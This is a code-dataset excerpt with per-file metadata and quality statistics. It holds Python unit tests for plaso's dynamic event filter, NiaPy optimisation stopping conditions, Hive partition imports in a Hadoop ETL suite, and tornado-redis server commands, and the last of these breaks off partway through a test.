hexsha
string | size
int64 | ext
string | lang
string | max_stars_repo_path
string | max_stars_repo_name
string | max_stars_repo_head_hexsha
string | max_stars_repo_licenses
list | max_stars_count
int64 | max_stars_repo_stars_event_min_datetime
string | max_stars_repo_stars_event_max_datetime
string | max_issues_repo_path
string | max_issues_repo_name
string | max_issues_repo_head_hexsha
string | max_issues_repo_licenses
list | max_issues_count
int64 | max_issues_repo_issues_event_min_datetime
string | max_issues_repo_issues_event_max_datetime
string | max_forks_repo_path
string | max_forks_repo_name
string | max_forks_repo_head_hexsha
string | max_forks_repo_licenses
list | max_forks_count
int64 | max_forks_repo_forks_event_min_datetime
string | max_forks_repo_forks_event_max_datetime
string | content
string | avg_line_length
float64 | max_line_length
int64 | alphanum_fraction
float64 | qsc_code_num_words_quality_signal
int64 | qsc_code_num_chars_quality_signal
float64 | qsc_code_mean_word_length_quality_signal
float64 | qsc_code_frac_words_unique_quality_signal
float64 | qsc_code_frac_chars_top_2grams_quality_signal
float64 | qsc_code_frac_chars_top_3grams_quality_signal
float64 | qsc_code_frac_chars_top_4grams_quality_signal
float64 | qsc_code_frac_chars_dupe_5grams_quality_signal
float64 | qsc_code_frac_chars_dupe_6grams_quality_signal
float64 | qsc_code_frac_chars_dupe_7grams_quality_signal
float64 | qsc_code_frac_chars_dupe_8grams_quality_signal
float64 | qsc_code_frac_chars_dupe_9grams_quality_signal
float64 | qsc_code_frac_chars_dupe_10grams_quality_signal
float64 | qsc_code_frac_chars_replacement_symbols_quality_signal
float64 | qsc_code_frac_chars_digital_quality_signal
float64 | qsc_code_frac_chars_whitespace_quality_signal
float64 | qsc_code_size_file_byte_quality_signal
float64 | qsc_code_num_lines_quality_signal
float64 | qsc_code_num_chars_line_max_quality_signal
float64 | qsc_code_num_chars_line_mean_quality_signal
float64 | qsc_code_frac_chars_alphabet_quality_signal
float64 | qsc_code_frac_chars_comments_quality_signal
float64 | qsc_code_cate_xml_start_quality_signal
float64 | qsc_code_frac_lines_dupe_lines_quality_signal
float64 | qsc_code_cate_autogen_quality_signal
float64 | qsc_code_frac_lines_long_string_quality_signal
float64 | qsc_code_frac_chars_string_length_quality_signal
float64 | qsc_code_frac_chars_long_word_length_quality_signal
float64 | qsc_code_frac_lines_string_concat_quality_signal
float64 | qsc_code_cate_encoded_data_quality_signal
float64 | qsc_code_frac_chars_hex_words_quality_signal
float64 | qsc_code_frac_lines_prompt_comments_quality_signal
float64 | qsc_code_frac_lines_assert_quality_signal
float64 | qsc_codepython_cate_ast_quality_signal
float64 | qsc_codepython_frac_lines_func_ratio_quality_signal
float64 | qsc_codepython_cate_var_zero_quality_signal
bool | qsc_codepython_frac_lines_pass_quality_signal
float64 | qsc_codepython_frac_lines_import_quality_signal
float64 | qsc_codepython_frac_lines_simplefunc_quality_signal
float64 | qsc_codepython_score_lines_no_logic_quality_signal
float64 | qsc_codepython_frac_lines_print_quality_signal
float64 | qsc_code_num_words
int64 | qsc_code_num_chars
int64 | qsc_code_mean_word_length
int64 | qsc_code_frac_words_unique
null | qsc_code_frac_chars_top_2grams
int64 | qsc_code_frac_chars_top_3grams
int64 | qsc_code_frac_chars_top_4grams
int64 | qsc_code_frac_chars_dupe_5grams
int64 | qsc_code_frac_chars_dupe_6grams
int64 | qsc_code_frac_chars_dupe_7grams
int64 | qsc_code_frac_chars_dupe_8grams
int64 | qsc_code_frac_chars_dupe_9grams
int64 | qsc_code_frac_chars_dupe_10grams
int64 | qsc_code_frac_chars_replacement_symbols
int64 | qsc_code_frac_chars_digital
int64 | qsc_code_frac_chars_whitespace
int64 | qsc_code_size_file_byte
int64 | qsc_code_num_lines
int64 | qsc_code_num_chars_line_max
int64 | qsc_code_num_chars_line_mean
int64 | qsc_code_frac_chars_alphabet
int64 | qsc_code_frac_chars_comments
int64 | qsc_code_cate_xml_start
int64 | qsc_code_frac_lines_dupe_lines
int64 | qsc_code_cate_autogen
int64 | qsc_code_frac_lines_long_string
int64 | qsc_code_frac_chars_string_length
int64 | qsc_code_frac_chars_long_word_length
int64 | qsc_code_frac_lines_string_concat
null | qsc_code_cate_encoded_data
int64 | qsc_code_frac_chars_hex_words
int64 | qsc_code_frac_lines_prompt_comments
int64 | qsc_code_frac_lines_assert
int64 | qsc_codepython_cate_ast
int64 | qsc_codepython_frac_lines_func_ratio
int64 | qsc_codepython_cate_var_zero
int64 | qsc_codepython_frac_lines_pass
int64 | qsc_codepython_frac_lines_import
int64 | qsc_codepython_frac_lines_simplefunc
int64 | qsc_codepython_score_lines_no_logic
int64 | qsc_codepython_frac_lines_print
int64 | effective
string | hits
int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
40b8041c856f172aaadfee395015899134e8714c
| 3,795
|
py
|
Python
|
tests/filters/dynamic_filter.py
|
CNR-ITTIG/plasodfaxp
|
923797fc00664fa9e3277781b0334d6eed5664fd
|
[
"Apache-2.0"
] | 1
|
2019-09-26T08:16:30.000Z
|
2019-09-26T08:16:30.000Z
|
tests/filters/dynamic_filter.py
|
CNR-ITTIG/plasodfaxp
|
923797fc00664fa9e3277781b0334d6eed5664fd
|
[
"Apache-2.0"
] | null | null | null |
tests/filters/dynamic_filter.py
|
CNR-ITTIG/plasodfaxp
|
923797fc00664fa9e3277781b0334d6eed5664fd
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/python
# -*- coding: utf-8 -*-
"""Tests for the dynamic event object filter."""
import unittest
from plaso.filters import dynamic_filter
from plaso.lib import errors
from tests.filters import test_lib
class DynamicFilterTest(test_lib.FilterTestCase):
"""Tests for the DynamicFilter filter."""
def testCompilerFilter(self):
"""Tests the CompileFilter function."""
test_filter = dynamic_filter.DynamicFilter()
test_filter.CompileFilter(
u'SELECT stuff FROM machine WHERE some_stuff is "random"')
test_filter.CompileFilter(
u'SELECT field_a, field_b, field_c')
test_filter.CompileFilter(
u'SELECT field_a, field_b, field_c SEPARATED BY "%"')
test_filter.CompileFilter(
u'SELECT field_a, field_b, field_c LIMIT 10')
test_filter.CompileFilter(
u'SELECT field_a, field_b, field_c LIMIT 10 SEPARATED BY "|"')
test_filter.CompileFilter(
u'SELECT field_a, field_b, field_c SEPARATED BY "|" LIMIT 10')
test_filter.CompileFilter(
u'SELECT field_a, field_b, field_c WHERE date > "2012"')
test_filter.CompileFilter(
u'SELECT field_a, field_b, field_c WHERE date > "2012" LIMIT 100')
test_filter.CompileFilter((
u'SELECT field_a, field_b, field_c WHERE date > "2012" SEPARATED BY '
u'"@" LIMIT 100'))
test_filter.CompileFilter((
u'SELECT parser, date, time WHERE some_stuff is "random" and '
u'date < "2021-02-14 14:51:23"'))
with self.assertRaises(errors.WrongPlugin):
test_filter.CompileFilter(
u'/tmp/file_that_most_likely_does_not_exist')
with self.assertRaises(errors.WrongPlugin):
test_filter.CompileFilter(
u'some random stuff that is destined to fail')
with self.assertRaises(errors.WrongPlugin):
test_filter.CompileFilter(
u'some_stuff is "random" and other_stuff ')
with self.assertRaises(errors.WrongPlugin):
test_filter.CompileFilter(
u'some_stuff is "random" and other_stuff is not "random"')
with self.assertRaises(errors.WrongPlugin):
test_filter.CompileFilter(
u'SELECT stuff FROM machine WHERE conditions are met')
with self.assertRaises(errors.WrongPlugin):
test_filter.CompileFilter(u'SELECT field_a, field_b WHERE ')
with self.assertRaises(errors.WrongPlugin):
test_filter.CompileFilter(u'SELECT field_a, field_b SEPARATED BY')
with self.assertRaises(errors.WrongPlugin):
test_filter.CompileFilter(u'SELECT field_a, SEPARATED BY field_b WHERE ')
with self.assertRaises(errors.WrongPlugin):
test_filter.CompileFilter(u'SELECT field_a, field_b LIMIT WHERE')
def testFilterFields(self):
test_filter = dynamic_filter.DynamicFilter()
test_filter.CompileFilter(
u'SELECT stuff FROM machine WHERE some_stuff is "random"')
expected_fields = [u'stuff']
self.assertEqual(test_filter.fields, expected_fields)
test_filter.CompileFilter(
u'SELECT stuff, a, b, date FROM machine WHERE some_stuff is "random"')
expected_fields = [u'stuff', u'a', u'b', u'date']
self.assertEqual(test_filter.fields, expected_fields)
test_filter.CompileFilter(
u'SELECT date, message, zone, hostname WHERE some_stuff is "random"')
expected_fields = [u'date', u'message', u'zone', u'hostname']
self.assertEqual(test_filter.fields, expected_fields)
test_filter.CompileFilter(u'SELECT hlutir')
expected_fields = [u'hlutir']
self.assertEqual(test_filter.fields, expected_fields)
test_filter.CompileFilter(u'SELECT hlutir LIMIT 10')
expected_fields = [u'hlutir']
self.assertEqual(test_filter.fields, expected_fields)
self.assertEqual(10, test_filter.limit)
if __name__ == '__main__':
unittest.main()
| 33.289474
| 79
| 0.710408
| 498
| 3,795
| 5.208835
| 0.172691
| 0.123362
| 0.212799
| 0.222051
| 0.767926
| 0.758288
| 0.756361
| 0.738628
| 0.724364
| 0.692753
| 0
| 0.013961
| 0.188406
| 3,795
| 113
| 80
| 33.584071
| 0.828247
| 0.039789
| 0
| 0.506667
| 0
| 0
| 0.336642
| 0.011304
| 0
| 0
| 0
| 0
| 0.2
| 1
| 0.026667
| false
| 0
| 0.053333
| 0
| 0.093333
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
40c4dba2fcc2dee397c04eebb18b94347c5ff22e
| 3,081
|
py
|
Python
|
NiaPy/tests/test_iter_gen_counters.py
|
rhododendrom/NiaPy
|
873037e4337474bb75714f1c2be273c97de3eded
|
[
"MIT"
] | 1
|
2020-03-16T11:15:43.000Z
|
2020-03-16T11:15:43.000Z
|
NiaPy/tests/test_iter_gen_counters.py
|
rhododendrom/NiaPy
|
873037e4337474bb75714f1c2be273c97de3eded
|
[
"MIT"
] | null | null | null |
NiaPy/tests/test_iter_gen_counters.py
|
rhododendrom/NiaPy
|
873037e4337474bb75714f1c2be273c97de3eded
|
[
"MIT"
] | null | null | null |
# pylint: disable=line-too-long
from unittest import TestCase
from NiaPy.algorithms.basic import BatAlgorithm, FireflyAlgorithm
from NiaPy.task import StoppingTask, OptimizationType
from NiaPy.algorithms.basic import DifferentialEvolution
from NiaPy.benchmarks import Sphere
class DETestCase(TestCase):
r"""Test cases for evaluating different stopping conditions.
**Date:** November 2018
**Author:** Iztok
**Author:** This is a very important test!
"""
def test_DE_evals_fine(self):
task = StoppingTask(
D=10,
nFES=1000,
optType=OptimizationType.MINIMIZATION,
benchmark=Sphere())
algo = DifferentialEvolution(NP=40, CR=0.9, F=0.5)
algo.runTask(task)
evals = task.evals()
self.assertEqual(1000, evals)
def test_DE_iters_fine(self):
task = StoppingTask(
D=10,
nGEN=1000,
optType=OptimizationType.MINIMIZATION,
benchmark=Sphere())
algo = DifferentialEvolution(NP=40, CR=0.9, F=0.5)
algo.runTask(task)
iters = task.iters()
self.assertEqual(1000, iters)
class BATestCase(TestCase):
r"""Test cases for evaluating different stopping conditions.
**Date:** November 2018
**Author:** Iztok
**Author:** This is a very important test!
"""
def test_BA_evals_fine(self):
task = StoppingTask(
D=10,
nFES=1000,
optType=OptimizationType.MINIMIZATION,
benchmark=Sphere())
algo = BatAlgorithm(NP=25)
algo.runTask(task)
evals = task.evals()
self.assertEqual(1000, evals)
def test_BA_iters_fine(self):
task = StoppingTask(
D=10,
nGEN=1000,
optType=OptimizationType.MINIMIZATION,
benchmark=Sphere())
algo = BatAlgorithm(NP=25)
algo.runTask(task)
iters = task.iters()
self.assertEqual(1000, iters)
# 1000 BA iterations spend 10010 FES (10 + 10 * 1000)
def test_BA_iters_to_fes(self):
task = StoppingTask(
D=10,
nGEN=1000,
optType=OptimizationType.MINIMIZATION,
benchmark=Sphere())
algo = BatAlgorithm(NP=10)
algo.runTask(task)
evals = task.evals()
self.assertEqual(10000, evals)
class FATestCase(TestCase):
def test_FA_evals_fine(self):
task = StoppingTask(
D=10,
nFES=1000,
optType=OptimizationType.MINIMIZATION,
benchmark=Sphere())
algo = FireflyAlgorithm(NP=25)
algo.runTask(task)
evals = task.evals()
self.assertEqual(1000, evals)
def test_FA_iters_fine(self):
task = StoppingTask(
D=10,
nGEN=1000,
optType=OptimizationType.MINIMIZATION,
benchmark=Sphere())
algo = FireflyAlgorithm(NP=25)
algo.runTask(task)
iters = task.iters()
self.assertEqual(1000, iters)
| 27.508929
| 65
| 0.59234
| 321
| 3,081
| 5.616822
| 0.233645
| 0.039933
| 0.077648
| 0.081531
| 0.824182
| 0.790904
| 0.790904
| 0.790904
| 0.7665
| 0.7665
| 0
| 0.055477
| 0.30964
| 3,081
| 111
| 66
| 27.756757
| 0.792196
| 0.12074
| 0
| 0.7625
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.0875
| 1
| 0.0875
| false
| 0
| 0.0625
| 0
| 0.1875
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
40ffdc70af85c56e72ec479c99cf1a74e1e362bd
| 8,016
|
py
|
Python
|
tests/hadoop-etl/test/partitions.py
|
mace84/script-languages
|
d586cbe212bbb4efbfb39e095183729c65489360
|
[
"MIT"
] | 6
|
2019-01-09T11:55:15.000Z
|
2021-06-25T19:52:42.000Z
|
tests/hadoop-etl/test/partitions.py
|
mace84/script-languages
|
d586cbe212bbb4efbfb39e095183729c65489360
|
[
"MIT"
] | 65
|
2018-12-12T08:40:38.000Z
|
2022-02-28T09:19:45.000Z
|
tests/hadoop-etl/test/partitions.py
|
mace84/script-languages
|
d586cbe212bbb4efbfb39e095183729c65489360
|
[
"MIT"
] | 9
|
2018-11-23T08:59:09.000Z
|
2020-02-04T12:56:35.000Z
|
#!/usr/bin/env python2.7
# encoding: utf8
import os
import sys
sys.path.append(os.path.realpath(__file__ + '/../../../lib'))
sys.path.append(os.path.realpath(__file__ + '/../../lib'))
import udf
import utils
import datagen
import hadoopenv
class TestPartitionDate(utils.HiveTestCase):
hive_file_format = 'textfile'
hive_table = '{file_format}_%s'.format(file_format = hive_file_format)
hive_col_types = ['decimal(36,0)', 'tinyint', 'smallint', 'int', 'bigint', 'decimal(18,5)', 'float', 'double', \
'date', 'timestamp', 'string', 'char(20)', 'varchar(50)', 'boolean', 'binary']
# Partition columns listed last
exa_col_types = ['decimal(36,0)', 'tinyint', 'smallint', 'int', 'bigint', 'decimal(18,5)', 'float', 'double', \
'timestamp', 'varchar(5000)', 'char(20)', 'varchar(50)', 'boolean', 'varchar(5000) ASCII', 'date']
hive_config_props = ['hive.exec.dynamic.partition=true', \
'hive.exec.dynamic.partition.mode=nonstrict']
hive_partition_col_nums = [9]
num_rows = 100
has_id_col = True
def test(self):
utils.test_import(self)
utils.validate_import_odbc(self)
class TestPartitionTinyint(utils.HiveTestCase):
hive_file_format = 'textfile'
hive_table = '{file_format}_%s'.format(file_format = hive_file_format)
hive_col_types = ['decimal(36,0)', 'tinyint', 'smallint', 'int', 'bigint', 'decimal(18,5)', 'float', 'double', \
'date', 'timestamp', 'string', 'char(20)', 'varchar(50)', 'boolean', 'binary']
# Partition columns listed last
exa_col_types = ['decimal(36,0)', 'smallint', 'int', 'bigint', 'decimal(18,5)', 'float', 'double', \
'date', 'timestamp', 'varchar(5000)', 'char(20)', 'varchar(50)', 'boolean', 'varchar(5000) ASCII', 'tinyint']
hive_config_props = ['hive.exec.dynamic.partition=true', \
'hive.exec.dynamic.partition.mode=nonstrict']
hive_partition_col_nums = [2]
num_rows = 100
has_id_col = True
def test(self):
utils.test_import(self)
utils.validate_import_odbc(self)
class TestPartitionChar(utils.HiveTestCase):
hive_file_format = 'textfile'
hive_table = '{file_format}_%s'.format(file_format = hive_file_format)
hive_col_types = ['decimal(36,0)', 'tinyint', 'smallint', 'int', 'bigint', 'decimal(18,5)', 'float', 'double', \
'date', 'timestamp', 'string', 'char(20)', 'varchar(50)', 'boolean', 'binary']
# Partition columns listed last
exa_col_types = ['decimal(36,0)', 'tinyint', 'smallint', 'int', 'bigint', 'decimal(18,5)', 'float', 'double', \
'date', 'timestamp', 'varchar(5000)', 'varchar(50)', 'boolean', 'varchar(5000) ASCII', 'char(20)']
hive_config_props = ['hive.exec.dynamic.partition=true', \
'hive.exec.dynamic.partition.mode=nonstrict']
hive_partition_col_nums = [12]
num_rows = 100
has_id_col = True
def test(self):
utils.test_import(self)
utils.validate_import_odbc(self)
class TestPartitionDouble(utils.HiveTestCase):
hive_file_format = 'textfile'
hive_table = '{file_format}_%s'.format(file_format = hive_file_format)
hive_col_types = ['decimal(36,0)', 'tinyint', 'smallint', 'int', 'bigint', 'decimal(18,5)', 'float', 'double', \
'date', 'timestamp', 'string', 'char(20)', 'varchar(50)', 'boolean', 'binary']
# Partition columns listed last
exa_col_types = ['decimal(36,0)', 'tinyint', 'smallint', 'int', 'bigint', 'decimal(18,5)', 'float', \
'date', 'timestamp', 'varchar(5000)', 'char(20)', 'varchar(50)', 'boolean', 'varchar(5000) ASCII', 'double']
hive_config_props = ['hive.exec.dynamic.partition=true', \
'hive.exec.dynamic.partition.mode=nonstrict']
hive_partition_col_nums = [8]
num_rows = 100
has_id_col = True
def test(self):
utils.test_import(self)
utils.validate_import_odbc(self)
class TestPartitionTinyintDate(utils.HiveTestCase):
hive_file_format = 'textfile'
hive_table = '{file_format}_%s'.format(file_format = hive_file_format)
hive_col_types = ['decimal(36,0)', 'tinyint', 'smallint', 'int', 'bigint', 'decimal(18,5)', 'float', 'double', \
'date', 'timestamp', 'string', 'char(20)', 'varchar(50)', 'boolean', 'binary']
# Partition columns listed last
exa_col_types = ['decimal(36,0)', 'smallint', 'int', 'bigint', 'decimal(18,5)', 'float', 'double', \
'timestamp', 'varchar(5000)', 'char(20)', 'varchar(50)', 'boolean', 'varchar(5000) ASCII', 'tinyint', 'date']
hive_config_props = ['hive.exec.dynamic.partition=true', \
'hive.exec.dynamic.partition.mode=nonstrict']
hive_partition_col_nums = [2, 9]
num_rows = 100
has_id_col = True
def test(self):
utils.test_import(self)
utils.validate_import_odbc(self)
# Hive bug: Boolean partition values are always given as 'true'
'''
class TestPartitionBooleanTimestamp(utils.HiveTestCase):
hive_file_format = 'textfile'
hive_table = '{file_format}_%s'.format(file_format = hive_file_format)
hive_col_types = ['decimal(36,0)', 'tinyint', 'smallint', 'int', 'bigint', 'decimal(18,5)', 'float', 'double', \
'date', 'timestamp', 'string', 'char(20)', 'varchar(50)', 'boolean', 'binary']
# Partition columns listed last
exa_col_types = ['decimal(36,0)', 'tinyint', 'smallint', 'int', 'bigint', 'decimal(18,5)', 'float', 'double', \
'date', 'varchar(5000)', 'char(20)', 'varchar(50)', 'varchar(5000) ASCII', 'boolean', 'timestamp']
hive_config_props = ['hive.exec.dynamic.partition=true', \
'hive.exec.dynamic.partition.mode=nonstrict']
hive_partition_col_nums = [14, 10]
num_rows = 100
has_id_col = True
def test(self):
utils.test_import(self)
utils.validate_import_odbc(self)
class TestPartitionBooleanCharInt(utils.HiveTestCase):
hive_file_format = 'textfile'
hive_table = '{file_format}_%s'.format(file_format = hive_file_format)
hive_col_types = ['decimal(36,0)', 'tinyint', 'smallint', 'int', 'bigint', 'decimal(18,5)', 'float', 'double', \
'date', 'timestamp', 'string', 'char(20)', 'varchar(50)', 'boolean', 'binary']
# Partition columns listed last
exa_col_types = ['decimal(36,0)', 'tinyint', 'smallint', 'bigint', 'decimal(18,5)', 'float', 'double', \
'date', 'timestamp', 'varchar(5000)', 'varchar(50)', 'varchar(5000) ASCII', 'boolean', 'char(20)', 'int']
hive_config_props = ['hive.exec.dynamic.partition=true', \
'hive.exec.dynamic.partition.mode=nonstrict']
hive_partition_col_nums = [14, 12, 4]
num_rows = 100
has_id_col = True
def test(self):
utils.test_import(self)
utils.validate_import_odbc(self)
'''
class TestPartitionCharDateInt(utils.HiveTestCase):
hive_file_format = 'textfile'
hive_table = '{file_format}_%s'.format(file_format = hive_file_format)
hive_col_types = ['decimal(36,0)', 'tinyint', 'smallint', 'int', 'bigint', 'decimal(18,5)', 'float', 'double', \
'date', 'timestamp', 'string', 'char(20)', 'varchar(50)', 'boolean', 'binary']
# Partition columns listed last
exa_col_types = ['decimal(36,0)', 'tinyint', 'smallint', 'bigint', 'decimal(18,5)', 'float', 'double', \
'timestamp', 'varchar(5000)', 'varchar(50)', 'boolean', 'varchar(5000) ASCII', 'char(20)', 'date', 'int']
hive_config_props = ['hive.exec.dynamic.partition=true', \
'hive.exec.dynamic.partition.mode=nonstrict']
hive_partition_col_nums = [12, 9, 4]
num_rows = 100
has_id_col = True
def test(self):
utils.test_import(self)
utils.validate_import_odbc(self)
if __name__ == '__main__':
udf.main()
| 46.33526
| 130
| 0.617889
| 952
| 8,016
| 4.992647
| 0.101891
| 0.067326
| 0.047128
| 0.057227
| 0.920471
| 0.920471
| 0.905323
| 0.905323
| 0.891016
| 0.891016
| 0
| 0.04245
| 0.203593
| 8,016
| 172
| 131
| 46.604651
| 0.702068
| 0.03493
| 0
| 0.7
| 0
| 0
| 0.35982
| 0.076697
| 0
| 0
| 0
| 0
| 0
| 1
| 0.06
| false
| 0
| 0.18
| 0
| 0.78
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 7
|
9057a13bbe1c5d3342d7335d62d8a4f6f5ba4099
| 27,412
|
py
|
Python
|
tornadoredis/tests/server_commands.py
|
jbochi/tornado-redis
|
525b6743891913cfd664a90685fa7f1be239804d
|
[
"Apache-2.0"
] | 1
|
2015-11-08T15:32:29.000Z
|
2015-11-08T15:32:29.000Z
|
tornadoredis/tests/server_commands.py
|
jbochi/tornado-redis
|
525b6743891913cfd664a90685fa7f1be239804d
|
[
"Apache-2.0"
] | null | null | null |
tornadoredis/tests/server_commands.py
|
jbochi/tornado-redis
|
525b6743891913cfd664a90685fa7f1be239804d
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from datetime import datetime
from tornado import gen
from redistest import RedisTestCase, async_test
class ServerCommandsTestCase(RedisTestCase):
@async_test
@gen.engine
def test_setget_unicode(self):
res = yield gen.Task(self.client.set, 'foo', u'бар')
self.assertEqual(res, True)
res = yield gen.Task(self.client.get, 'foo')
self.assertEqual(res, 'бар')
self.stop()
@async_test
@gen.engine
def test_set(self):
res = yield gen.Task(self.client.set, 'foo', 'bar')
self.assertEqual(res, True)
self.stop()
@async_test
@gen.engine
def test_delete(self):
res = yield gen.Task(self.client.mset, {'a': 1, 'b': 2, 'c': 3})
res = yield gen.Task(self.client.delete, 'a')
res = yield gen.Task(self.client.exists, 'a')
self.assertEqual(res, False)
res = yield gen.Task(self.client.delete, 'b', 'c')
res = yield gen.Task(self.client.exists, 'b')
self.assertEqual(res, False)
res = yield gen.Task(self.client.exists, 'c')
self.assertEqual(res, False)
self.stop()
@async_test
@gen.engine
def test_setex(self):
res = yield gen.Task(self.client.setex, 'foo', 5, 'bar')
self.assertEqual(res, True)
res = yield gen.Task(self.client.ttl, 'foo')
self.assertEqual(res, 5)
self.stop()
@async_test
@gen.engine
def test_setnx(self):
res = yield gen.Task(self.client.setnx, 'a', 1)
self.assertEqual(res, True)
res = yield gen.Task(self.client.setnx, 'a', 0)
self.assertEqual(res, False)
self.stop()
@async_test
@gen.engine
def test_get(self):
res = yield gen.Task(self.client.set, 'foo', 'bar')
self.assertEqual(res, True)
res = yield gen.Task(self.client.get, 'foo')
self.assertEqual(res, 'bar')
self.stop()
@async_test
@gen.engine
def test_randomkey(self):
res = yield gen.Task(self.client.set, 'a', 1)
self.assertEqual(res, True)
res = yield gen.Task(self.client.set, 'b', 1)
self.assertEqual(res, True)
res = yield gen.Task(self.client.randomkey)
self.assertIn(res, ['a', 'b'])
res = yield gen.Task(self.client.randomkey)
self.assertIn(res, ['a', 'b'])
res = yield gen.Task(self.client.randomkey)
self.assertIn(res, ['a', 'b'])
self.stop()
@async_test
@gen.engine
def test_substr(self):
res = yield gen.Task(self.client.set, 'foo', 'lorem ipsum')
self.assertEqual(res, True)
res = yield gen.Task(self.client.substr, 'foo', 2, 4)
self.assertEqual(res, 'rem')
self.stop()
@async_test
@gen.engine
def test_append(self):
res = yield gen.Task(self.client.set, 'foo', 'lorem ipsum')
self.assertEqual(res, True)
res = yield gen.Task(self.client.append, 'foo', ' bar')
self.assertEqual(res, 15)
res = yield gen.Task(self.client.get, 'foo')
self.assertEqual(res, 'lorem ipsum bar')
self.stop()
@async_test
@gen.engine
def test_dbsize(self):
res = yield gen.Task(self.client.set, 'a', 1)
self.assertEqual(res, True)
res = yield gen.Task(self.client.set, 'b', 2)
self.assertEqual(res, True)
res = yield gen.Task(self.client.dbsize)
self.assertEqual(res, 2)
self.stop()
@async_test
@gen.engine
def test_save(self):
now = datetime.now().replace(microsecond=0)
res = yield gen.Task(self.client.save)
self.assertEqual(res, True)
res = yield gen.Task(self.client.lastsave)
self.assertGreaterEqual(res, now)
self.stop()
@async_test
@gen.engine
def test_keys(self):
res = yield gen.Task(self.client.set, 'a', 1)
self.assertEqual(res, True)
res = yield gen.Task(self.client.set, 'b', 2)
self.assertEqual(res, True)
res = yield gen.Task(self.client.keys, '*')
self.assertEqual(res, ['a', 'b'])
res = yield gen.Task(self.client.keys, '')
self.assertEqual(res, [])
res = yield gen.Task(self.client.set, 'foo_a', 1)
self.assertEqual(res, True)
res = yield gen.Task(self.client.set, 'foo_b', 2)
self.assertEqual(res, True)
res = yield gen.Task(self.client.keys, 'foo_*')
self.assertEqual(res, ['foo_a', 'foo_b'])
self.stop()
@async_test
@gen.engine
def test_expire(self):
res = yield gen.Task(self.client.set, 'a', 1)
self.assertEqual(res, True)
res = yield gen.Task(self.client.expire, 'a', 10)
self.assertEqual(res, True)
res = yield gen.Task(self.client.ttl, 'a')
self.assertEqual(res, 10)
self.stop()
@async_test
@gen.engine
def test_type(self):
res = yield gen.Task(self.client.set, 'a', 1)
self.assertEqual(res, True)
res = yield gen.Task(self.client.type, 'a')
self.assertEqual(res, 'string')
res = yield gen.Task(self.client.rpush, 'b', 1)
self.assertEqual(res, True)
res = yield gen.Task(self.client.type, 'b')
self.assertEqual(res, 'list')
res = yield gen.Task(self.client.sadd, 'c', 1)
self.assertEqual(res, True)
res = yield gen.Task(self.client.type, 'c')
self.assertEqual(res, 'set')
res = yield gen.Task(self.client.hset, 'd', 'a', 1)
self.assertEqual(res, True)
res = yield gen.Task(self.client.type, 'd')
self.assertEqual(res, 'hash')
res = yield gen.Task(self.client.zadd, 'e', 1, 1)
self.assertEqual(res, True)
res = yield gen.Task(self.client.type, 'e')
self.assertEqual(res, 'zset')
self.stop()
@async_test
@gen.engine
def test_rename(self):
res = yield gen.Task(self.client.set, 'a', 1)
self.assertEqual(res, True)
res = yield gen.Task(self.client.rename, 'a', 'b')
self.assertEqual(res, True)
res = yield gen.Task(self.client.set, 'c', 1)
self.assertEqual(res, True)
res = yield gen.Task(self.client.renamenx, 'c', 'b')
self.assertEqual(res, False)
self.stop()
@async_test
@gen.engine
def test_move(self):
res = yield gen.Task(self.client.select, 8)
self.assertEqual(res, True)
res = yield gen.Task(self.client.delete, 'a')
self.assertEqual(res, False)
res = yield gen.Task(self.client.select, 9)
self.assertEqual(res, True)
res = yield gen.Task(self.client.set, 'a', 1)
self.assertEqual(res, True)
res = yield gen.Task(self.client.move, 'a', 8)
self.assertEqual(res, True)
res = yield gen.Task(self.client.exists, 'a')
self.assertEqual(res, False)
res = yield gen.Task(self.client.select, 8)
self.assertEqual(res, True)
res = yield gen.Task(self.client.get, 'a')
self.assertEqual(res, '1')
res = yield gen.Task(self.client.select, 8)
self.assertEqual(res, True)
res = yield gen.Task(self.client.delete, 'a')
self.assertEqual(res, True)
self.stop()
@async_test
@gen.engine
def test_exists(self):
res = yield gen.Task(self.client.set, 'a', 1)
self.assertEqual(res, True)
res = yield gen.Task(self.client.exists, 'a')
self.assertEqual(res, True)
res = yield gen.Task(self.client.delete, 'a')
self.assertEqual(res, True)
res = yield gen.Task(self.client.exists, 'a')
self.assertEqual(res, False)
self.stop()
@async_test
@gen.engine
def test_mset_mget(self):
res = yield gen.Task(self.client.mset, {'a': 1, 'b': 2})
self.assertEqual(res, True)
res = yield gen.Task(self.client.get, 'a')
self.assertEqual(res, '1')
res = yield gen.Task(self.client.get, 'b')
self.assertEqual(res, '2')
res = yield gen.Task(self.client.mget, ['a', 'b'])
self.assertEqual(res, ['1', '2'])
self.stop()
@async_test
@gen.engine
def test_msetnx(self):
res = yield gen.Task(self.client.msetnx, {'a': 1, 'b': 2})
self.assertEqual(res, True)
res = yield gen.Task(self.client.msetnx, {'b': 3, 'c': 4})
self.assertEqual(res, False)
self.stop()
@async_test
@gen.engine
def test_getset(self):
res = yield gen.Task(self.client.set, 'a', 1)
self.assertEqual(res, True)
